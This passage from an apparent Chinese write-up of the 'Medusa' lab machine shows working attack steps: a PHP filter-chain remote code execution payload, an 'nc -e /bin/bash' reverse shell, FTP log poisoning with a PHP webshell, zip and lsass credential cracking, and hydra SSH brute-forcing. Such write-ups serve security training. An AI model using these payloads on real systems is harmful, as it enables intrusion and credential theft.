CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.iconv.UHC.CP1361|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode\/resource=php:\/\/temp&0=whoami<\/code><\/pre>\n
\"image-20240426165204631\"<\/div><\/p>\n
\u5c1d\u8bd5\u53cd\u5f39shell\uff01\uff01\uff01<\/p>\n
http:\/\/dev.medusa.hmv\/files\/system.php?view=php:\/\/filter\/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.iconv.UCS2.UTF-8|convert.iconv.CSISOLATIN6.UCS-4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.iconv.UHC.CP1361|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.BIG5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.iconv.UHC.CP1361|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode\/resource=php:\/\/temp&0=nc%20-e%20\/bin\/bash%20192.168.0.143%201234<\/code><\/pre>\n
\u62ff\u4e0bshell\uff01\uff01\uff01<\/p>\n
\"image-20240426165312964\"<\/div><\/p>\n
\u65b9\u6cd5\u4e8c\uff1aftp\u65e5\u5fd7\u6ce8\u5165<\/h3>\n
\u5230\u73b0\u5728\u4e3a\u6b62\uff0c\u6211\u4eec\u90fd\u6ca1\u6709\u7528\u5230\u90a3\u4e2aftp\uff0c\u5176\u5b9e\u5728\u8fd9\u91cc\u53ef\u4ee5\u7528\u5230\uff0c\u6211\u4eec\u518d\u6b21\u8fdb\u884cfuzz\uff0c\u5c31\u53ef\u4ee5\u770b\u5230\u6211\u4eec\u53ef\u4ee5\u5229\u7528\u4e00\u4e2a\u7279\u6b8a\u7684\u65e5\u5fd7\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/medusa]\n\u2514\u2500$ ffuf -u "http:\/\/dev.medusa.hmv\/files\/system.php?view=FUZZ" -w \/usr\/share\/seclists\/Fuzzing\/LFI\/LFI-LFISuite-pathtotest.txt -fs 0 \n\n        \/'___\\  \/'___\\           \/'___\\       \n       \/\\ \\__\/ \/\\ \\__\/  __  __  \/\\ \\__\/       \n       \\ \\ ,__\\\\ \\ ,__\\\/\\ \\\/\\ \\ \\ \\ ,__\\      \n        \\ \\ \\_\/ \\ \\ \\_\/\\ \\ \\_\\ \\ \\ \\ \\_\/      \n         \\ \\_\\   \\ \\_\\  \\ \\____\/  \\ \\_\\       \n          \\\/_\/    \\\/_\/   \\\/___\/    \\\/_\/       \n\n       v2.1.0-dev\n________________________________________________\n\n :: Method           : GET\n :: URL              : http:\/\/dev.medusa.hmv\/files\/system.php?view=FUZZ\n :: Wordlist         : FUZZ: \/usr\/share\/seclists\/Fuzzing\/LFI\/LFI-LFISuite-pathtotest.txt\n :: Follow redirects : false\n :: Calibration      : false\n :: Timeout          : 10\n :: Threads          : 40\n :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500\n :: Filter           : Response size: 0\n________________________________________________\n\n\/proc\/self\/status       [Status: 200, Size: 1327, Words: 92, Lines: 57, Duration: 4ms]\n\/proc\/self\/stat         [Status: 200, Size: 318, Words: 52, Lines: 2, Duration: 4ms]\n\/proc\/self\/cmdline      [Status: 200, Size: 27, Words: 1, Lines: 1, Duration: 5ms]\n\/etc\/group              [Status: 200, Size: 758, Words: 1, Lines: 55, Duration: 8ms]\n..\/..\/..\/..\/etc\/passwd  [Status: 200, Size: 1452, Words: 14, Lines: 28, Duration: 2ms]\n..\/..\/..\/..\/..\/..\/etc\/passwd [Status: 200, Size: 1452, Words: 14, Lines: 28, Duration: 2ms]\n..\/..\/..\/..\/..\/etc\/passwd [Status: 200, Size: 1452, Words: 14, Lines: 28, Duration: 3ms]\n..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd [Status: 200, Size: 1452, Words: 14, Lines: 28, Duration: 2ms]\n..\/..\/..\/..\/..\/..\/..\/etc\/passwd [Status: 200, Size: 1452, Words: 14, Lines: 28, Duration: 3ms]\n..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd [Status: 200, Size: 1452, Words: 14, Lines: 28, Duration: 1ms]\n..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd [Status: 200, Size: 1452, Words: 14, Lines: 28, Duration: 3ms]\n..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd [Status: 200, Size: 1452, Words: 14, Lines: 28, Duration: 2ms]\n..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd [Status: 200, Size: 1452, Words: 14, Lines: 28, Duration: 1ms]\n..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd [Status: 200, Size: 1452, Words: 14, Lines: 28, Duration: 1ms]\n..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd [Status: 200, Size: 1452, Words: 14, Lines: 28, Duration: 3ms]\n..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd [Status: 200, Size: 1452, Words: 14, Lines: 28, Duration: 4ms]\n\/var\/log\/vsftpd.log     [Status: 200, Size: 933, Words: 115, Lines: 13, Duration: 0ms]\n\/etc\/vsftpd.conf        [Status: 200, Size: 5850, Words: 806, Lines: 156, Duration: 0ms]\n..\/..\/..\/..\/etc\/group   [Status: 200, Size: 758, Words: 1, Lines: 55, Duration: 0ms]\n..\/..\/..\/..\/..\/..\/etc\/group [Status: 200, Size: 758, Words: 1, Lines: 55, Duration: 0ms]\n..\/..\/..\/..\/..\/etc\/group [Status: 200, Size: 758, Words: 1, Lines: 55, Duration: 1ms]\n..\/..\/..\/..\/..\/..\/..\/..\/etc\/group [Status: 200, Size: 758, Words: 1, Lines: 55, Duration: 0ms]\n..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/group [Status: 200, Size: 758, Words: 1, Lines: 55, Duration: 0ms]\n..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/group [Status: 200, Size: 758, Words: 1, Lines: 55, Duration: 0ms]\n..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/group [Status: 200, Size: 758, Words: 1, Lines: 55, Duration: 2ms]\n..\/..\/..\/..\/..\/..\/..\/etc\/group [Status: 200, Size: 758, Words: 1, Lines: 55, Duration: 3ms]\n..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/group [Status: 200, Size: 758, Words: 1, Lines: 55, Duration: 2ms]\n..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/group [Status: 200, Size: 758, Words: 1, Lines: 55, Duration: 1ms]\n..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/group [Status: 200, Size: 758, Words: 1, Lines: 55, Duration: 3ms]\n:: Progress: [569\/569] :: Job [1\/1] :: 0 req\/sec :: Duration: [0:00:00] :: Errors: 31 ::<\/code><\/pre>\n
\/var\/log\/vsftpd.log<\/code>\u662fftp\u767b\u5f55\u7684\u65e5\u5fd7\uff0c\u6240\u4ee5\u6211\u4eec\u5c1d\u8bd5\u6ce8\u5165\u6076\u610f\u4ee3\u7801\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/medusa]\n\u2514\u2500$ ftp 192.168.0.109                                                                                                              \nConnected to 192.168.0.109.\n220 (vsFTPd 3.0.3)\nName (192.168.0.109:kali): <?php system($_GET['hack']); ?>  \n331 Please specify the password.\nPassword: \n530 Login incorrect.\nftp: Login failed\nftp> exit\n221 Goodbye.<\/code><\/pre>\n
\u7136\u540e\u5c31\u53ef\u4ee5\u6267\u884c\u7cfb\u7edf\u547d\u4ee4\u4e86\uff01<\/p>\n
\"image-20240426170326545\"<\/div><\/p>\n
\u8fd9\u610f\u5473\u7740\u6211\u4eec\u968f\u65f6\u90fd\u53ef\u4ee5\u8fdb\u884c\u53cd\u5f39shell\uff01<\/p>\n
\u63d0\u6743<\/h2>\n
\u4fe1\u606f\u641c\u96c6<\/h3>\n
(remote) www-data@medusa:\/var\/www\/dev\/files$ whoami;id\nwww-data\nuid=33(www-data) gid=33(www-data) groups=33(www-data)\n(remote) www-data@medusa:\/var\/www\/dev\/files$ sudo -l\n\nWe trust you have received the usual lecture from the local System\nAdministrator. It usually boils down to these three things:\n\n    #1) Respect the privacy of others.\n    #2) Think before you type.\n    #3) With great power comes great responsibility.\n\n[sudo] password for www-data: \nsudo: a password is required\n(remote) www-data@medusa:\/var\/www\/dev\/files$ cd ..\n(remote) www-data@medusa:\/var\/www\/dev$ cd ..\n(remote) www-data@medusa:\/var\/www$ ls -la\ntotal 16\ndrwxr-xr-x  4 root root 4096 Jan 15  2023 .\ndrwxr-xr-x 12 root root 4096 Jan 15  2023 ..\ndrwxr-xr-x  5 root root 4096 Jan 19  2023 dev\ndrwxr-xr-x  3 root root 4096 Jan 19  2023 html\n(remote) www-data@medusa:\/var\/www$ cd ..\/  \n(remote) www-data@medusa:\/var$ ls -la\ntotal 48\ndrwxr-xr-x 12 root root  4096 Jan 15  2023 .\ndrwxr-xr-x 19 root root  4096 Jan 15  2023 ..\ndrwxr-xr-x  2 root root  4096 Jan 17  2023 backups\ndrwxr-xr-x 11 root root  4096 Jan 15  2023 cache\ndrwxr-xr-x 25 root root  4096 Jan 15  2023 lib\ndrwxrwsr-x  2 root staff 4096 Sep  3  2022 local\nlrwxrwxrwx  1 root root     9 Jan 15  2023 lock -> \/run\/lock\ndrwxr-xr-x  8 root root  4096 Apr 26 04:03 log\ndrwxrwsr-x  2 root mail  4096 Jan 15  2023 mail\ndrwxr-xr-x  2 root root  4096 Jan 15  2023 opt\nlrwxrwxrwx  1 root root     4 Jan 15  2023 run -> \/run\ndrwxr-xr-x  4 root root  4096 Jan 15  2023 spool\ndrwxrwxrwt  2 root root  4096 Apr 26 04:03 tmp\ndrwxr-xr-x  4 root root  4096 Jan 15  2023 www\n(remote) www-data@medusa:\/var$ cd backups\/\n(remote) www-data@medusa:\/var\/backups$ ls -la\ntotal 408\ndrwxr-xr-x  2 root root   4096 Jan 17  2023 .\ndrwxr-xr-x 12 root root   4096 Jan 15  2023 ..\n-rw-r--r--  1 root root  40960 Jan 17  2023 alternatives.tar.0\n-rw-r--r--  1 root root   8525 Jan 15  2023 apt.extended_states.0\n-rw-r--r--  1 root root      0 Jan 17  2023 dpkg.arch.0\n-rw-r--r--  1 root root    186 Jan 15  2023 dpkg.diversions.0\n-rw-r--r--  1 root root    172 Jan 15  2023 dpkg.statoverride.0\n-rw-r--r--  1 root root 346068 Jan 15  2023 dpkg.status.0\n(remote) www-data@medusa:\/var\/backups$ cd ..\/mail\n(remote) www-data@medusa:\/var\/mail$ ls -la\ntotal 8\ndrwxrwsr-x  2 root mail 4096 Jan 15  2023 .\ndrwxr-xr-x 12 root root 4096 Jan 15  2023 ..\n(remote) www-data@medusa:\/var\/mail$ cd \/home\n(remote) www-data@medusa:\/home$ ls\nspectre\n(remote) www-data@medusa:\/home$ cd spectre\/\n(remote) www-data@medusa:\/home\/spectre$ ls -la\ntotal 32\ndrwxr-xr-x 3 spectre spectre 4096 Jan 18  2023 .\ndrwxr-xr-x 3 root    root    4096 Jan 15  2023 ..\n-rw------- 1 spectre spectre  197 Jan 21  2023 .bash_history\n-rw-r--r-- 1 spectre spectre  220 Jan 15  2023 .bash_logout\n-rw-r--r-- 1 spectre spectre 3526 Jan 15  2023 .bashrc\ndrwxr-xr-x 3 spectre spectre 4096 Jan 18  2023 .local\n-rw-r--r-- 1 spectre spectre  807 Jan 15  2023 .profile\n-rw------- 1 spectre spectre   44 Jan 18  2023 user.txt\n(remote) www-data@medusa:\/home\/spectre$ cat \/etc\/passwd\nroot:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\nbackup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/run\/ircd:\/usr\/sbin\/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):\/var\/lib\/gnats:\/usr\/sbin\/nologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\n_apt:x:100:65534::\/nonexistent:\/usr\/sbin\/nologin\nsystemd-network:x:101:102:systemd Network Management,,,:\/run\/systemd:\/usr\/sbin\/nologin\nsystemd-resolve:x:102:103:systemd Resolver,,,:\/run\/systemd:\/usr\/sbin\/nologin\nmessagebus:x:103:109::\/nonexistent:\/usr\/sbin\/nologin\nsystemd-timesync:x:104:110:systemd Time Synchronization,,,:\/run\/systemd:\/usr\/sbin\/nologin\nsshd:x:105:65534::\/run\/sshd:\/usr\/sbin\/nologin\nspectre:x:1000:1000:spectre,,,:\/home\/spectre:\/bin\/bash\nsystemd-coredump:x:999:999:systemd Core Dumper:\/:\/usr\/sbin\/nologin\nftp:x:106:113:ftp daemon,,,:\/srv\/ftp:\/usr\/sbin\/nologin\n(remote) www-data@medusa:\/home\/spectre$ cd ..\/\n(remote) www-data@medusa:\/home$ ls -la\ntotal 12\ndrwxr-xr-x  3 root    root    4096 Jan 15  2023 .\ndrwxr-xr-x 19 root    root    4096 Jan 15  2023 ..\ndrwxr-xr-x  3 spectre spectre 4096 Jan 18  2023 spectre\n(remote) www-data@medusa:\/home$ cd \/\n(remote) www-data@medusa:\/$ ls -la\ntotal 72\ndrwxr-xr-x  19 root root  4096 Jan 15  2023 .\ndrwxr-xr-x  19 root root  4096 Jan 15  2023 ..\ndrwxr-xr-x   2 root root  4096 Jan 18  2023 ...\nlrwxrwxrwx   1 root root     7 Jan 15  2023 bin -> usr\/bin\ndrwxr-xr-x   3 root root  4096 Jan 15  2023 boot\ndrwxr-xr-x  17 root root  3140 Apr 26 04:03 dev\ndrwxr-xr-x  71 root root  4096 Apr 26 04:03 etc\ndrwxr-xr-x   3 root root  4096 Jan 15  2023 home\nlrwxrwxrwx   1 root root    31 Jan 15  2023 initrd.img -> boot\/initrd.img-5.10.0-20-amd64\nlrwxrwxrwx   1 root root    31 Jan 15  2023 initrd.img.old -> boot\/initrd.img-5.10.0-18-amd64\nlrwxrwxrwx   1 root root     7 Jan 15  2023 lib -> usr\/lib\nlrwxrwxrwx   1 root root     9 Jan 15  2023 lib32 -> usr\/lib32\nlrwxrwxrwx   1 root root     9 Jan 15  2023 lib64 -> usr\/lib64\nlrwxrwxrwx   1 root root    10 Jan 15  2023 libx32 -> usr\/libx32\ndrwx------   2 root root 16384 Jan 15  2023 lost+found\ndrwxr-xr-x   3 root root  4096 Jan 15  2023 media\ndrwxr-xr-x   2 root root  4096 Jan 15  2023 mnt\ndrwxr-xr-x   2 root root  4096 Jan 15  2023 opt\ndr-xr-xr-x 147 root root     0 Apr 26 04:03 proc\ndrwx------   3 root root  4096 Jan 30  2023 root\ndrwxr-xr-x  19 root root   540 Apr 26 04:03 run\nlrwxrwxrwx   1 root root     8 Jan 15  2023 sbin -> usr\/sbin\ndrwxr-xr-x   3 root root  4096 Jan 15  2023 srv\ndr-xr-xr-x  13 root root     0 Apr 26 04:03 sys\ndrwxrwxrwt   2 root root  4096 Apr 26 04:03 tmp\ndrwxr-xr-x  14 root root  4096 Jan 15  2023 usr\ndrwxr-xr-x  12 root root  4096 Jan 15  2023 var\nlrwxrwxrwx   1 root root    28 Jan 15  2023 vmlinuz -> boot\/vmlinuz-5.10.0-20-amd64\nlrwxrwxrwx   1 root root    28 Jan 15  2023 vmlinuz.old -> boot\/vmlinuz-5.10.0-18-amd64\n(remote) www-data@medusa:\/$ cd ...\n(remote) www-data@medusa:\/...$ ls -la\ntotal 12108\ndrwxr-xr-x  2 root     root         4096 Jan 18  2023 .\ndrwxr-xr-x 19 root     root         4096 Jan 15  2023 ..\n-rw-------  1 www-data www-data 12387024 Jan 18  2023 old_files.zip\n(remote) www-data@medusa:\/...$ ls -la\ntotal 12108\ndrwxr-xr-x  2 root     root         4096 Jan 18  2023 .\ndrwxr-xr-x 19 root     root         4096 Jan 15  2023 ..\n-rw-------  1 www-data www-data 12387024 Jan 18  2023 old_files.zip<\/code><\/pre>\n
\u63a2\u6d4b\u654f\u611f\u6587\u4ef6<\/h3>\n
\u89e3\u538b\u4e00\u4e0b\uff0c\u5c1d\u8bd5\u53d1\u73b0\u6709\u5565\u795e\u5947\u7684\u4e1c\u897f\uff1a<\/p>\n
(remote) www-data@medusa:\/...$ unzip old_files.zip \nbash: unzip: command not found<\/code><\/pre>\n
\u989d\uff0c\u4f20\u8fc7\u6765\u89e3\u538b\u5427\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/medusa]\n\u2514\u2500$ ls\nold_files.zip\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/medusa]\n\u2514\u2500$ unzip old_files.zip \nArchive:  old_files.zip\n   skipping: lsass.DMP               need PK compat. v5.1 (can do v4.6)\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/medusa]\n\u2514\u2500$ fcrackzip -u -D -p \/usr\/share\/wordlists\/rockyou.txt old_files.zip \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/medusa]\n\u2514\u2500$ file old_files.zip                                               \nold_files.zip: Zip archive data, at least v5.1 to extract, compression method=AES Encrypted\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/medusa]\n\u2514\u2500$ exiftool old_files.zip \nExifTool Version Number         : 12.76\nFile Name                       : old_files.zip\nDirectory                       : .\nFile Size                       : 12 MB\nFile Modification Date\/Time     : 2024:04:26 05:09:53-04:00\nFile Access Date\/Time           : 2024:04:26 05:10:07-04:00\nFile Inode Change Date\/Time     : 2024:04:26 05:09:53-04:00\nFile Permissions                : -rw-r--r--\nFile Type                       : ZIP\nFile Type Extension             : zip\nMIME Type                       : application\/zip\nZip Required Version            : 819\nZip Bit Flag                    : 0x0001\nZip Compression                 : Unknown (99)\nZip Modify Date                 : 2023:01:17 15:12:42\nZip CRC                         : 0x00000000\nZip Compressed Size             : 12386850\nZip Uncompressed Size           : 34804383\nZip File Name                   : lsass.DMP<\/code><\/pre>\n
\u5c1d\u8bd5john<\/code>\u7834\u89e3\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/medusa]\n\u2514\u2500$ zip2john old_files.zip > hash\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/medusa]\n\u2514\u2500$ john hash --wordlist=\/usr\/share\/wordlists\/rockyou.txt\nUsing default input encoding: UTF-8\nLoaded 1 password hash (ZIP, WinZip [PBKDF2-SHA1 256\/256 AVX2 8x])\nCost 1 (HMAC size) is 12386830 for all loaded hashes\nWill run 2 OpenMP threads\nPress 'q' or Ctrl-C to abort, almost any other key for status\nmedusa666        (old_files.zip\/lsass.DMP)     \n1g 0:00:02:29 DONE (2024-04-26 05:20) 0.006673g\/s 37778p\/s 37778c\/s 37778C\/s meeker75..medabe15\nUse the "--show" option to display all of the cracked passwords reliably\nSession completed.\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/medusa]\n\u2514\u2500$ john hash --show                                     \nold_files.zip\/lsass.DMP:medusa666:lsass.DMP:old_files.zip:old_files.zip\n\n1 password hash cracked, 0 left<\/code><\/pre>\n
\u5bb3\uff0c\u7ee7\u7eed\u89e3\u5bc6\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/medusa]\n\u2514\u2500$ 7z x old_files.zip \n\n7-Zip 23.01 (x64) : Copyright (c) 1999-2023 Igor Pavlov : 2023-06-20\n 64-bit locale=en_US.UTF-8 Threads:2 OPEN_MAX:1024\n\nScanning the drive for archives:\n1 file, 12387024 bytes (12 MiB)\n\nExtracting archive: old_files.zip\n--\nPath = old_files.zip\nType = zip\nPhysical Size = 12387024\n\nEnter password (will not be echoed):\nEverything is Ok\n\nSize:       34804383\nCompressed: 12387024\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/medusa]\n\u2514\u2500$ ls -la\ntotal 70296\ndrwxr-xr-x  2 kali kali     4096 Apr 26 05:22 .\ndrwxr-xr-x 71 kali kali     4096 Apr 26 04:06 ..\n-rw-r--r--  1 kali kali 24773794 Apr 26 05:15 hash\n-rwxr-xr-x  1 kali kali 34804383 Jan 17  2023 lsass.DMP\n-rw-r--r--  1 root root 12387024 Apr 26 05:09 old_files.zip<\/code><\/pre>\n
\"image-20240426172720991\"<\/div>
\n
\"image-20240426172810689\"<\/div><\/p>\n
\u5c1d\u8bd5\u4e00\u4e0b\uff1a<\/p>\n
\"image-20240426172955869\"<\/div><\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/medusa]\n\u2514\u2500$ pypykatz lsa minidump lsass.DMP\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/medusa]\n\u2514\u2500$ pypykatz lsa minidump lsass.DMP | grep "password"\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/medusa]\n\u2514\u2500$ pypykatz lsa minidump lsass.DMP | grep "username"<\/code><\/pre>\n
\u7206\u7834ssh<\/h3>\n
\u5c1d\u8bd5\u5f04\u4e00\u4e2a\u5b57\u5178\uff1a<\/p>\n
4v1jn3y4m_zxc\nt0p_s3cr3t\n4l13num_qwerty\np0w3rf1ll_abc\npr0xy_ch41ns_456\nn0s_v0lv1m0s_4_1lusi0n4r\nlittl3_h4ck3r\nn1mb3r_s1x\nb4ck3nd_pr0gr4m3r\nWh1t3_h4ck\nth3_b0ss\n5p3ctr3_p0is0n_xX\nlittl3_h4ck3r_v2\nb1zum_3_AM\nUnD3sc0n0c1d0\nbr4in_br34k3r\n123456  <\/code><\/pre>\n
\u8fd9\u662f\u5bc6\u7801\uff0c\u8fd8\u6709\u4e00\u4e2a\u7528\u6237\uff1a<\/p>\n
avijneyam\npowerful\nshelldredd\nalienum\nPr0xy\nClaor\nnolo\nnumero6\nct0l4\nLordP4\nsml\nspectre\nRiJaba1\njabatron\nInfayerTS\nd4t4s3c\nMedusa\ncromiphi<\/code><\/pre>\n
\u8fdb\u884c\u7206\u7834\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/medusa]\n\u2514\u2500$ hydra -L user.txt -P pass.txt ssh:\/\/192.168.0.109 \nHydra v9.5 (c) 2023 by van Hauser\/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).\n\nHydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) starting at 2024-04-26 05:40:46\n[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4\n[DATA] max 16 tasks per 1 server, overall 16 tasks, 306 login tries (l:18\/p:17), ~20 tries per task\n[DATA] attacking ssh:\/\/192.168.0.109:22\/\n[22][ssh] host: 192.168.0.109   login: spectre   password: 5p3ctr3_p0is0n_xX\n[STATUS] 293.00 tries\/min, 293 tries in 00:01h, 16 to do in 00:01h, 13 active\n1 of 1 target successfully completed, 1 valid password found\nHydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) finished at 2024-04-26 05:41:53<\/code><\/pre>\n
\"image-20240426174233480\"<\/div><\/p>\n
\u4fe1\u606f\u641c\u96c6<\/h3>\n
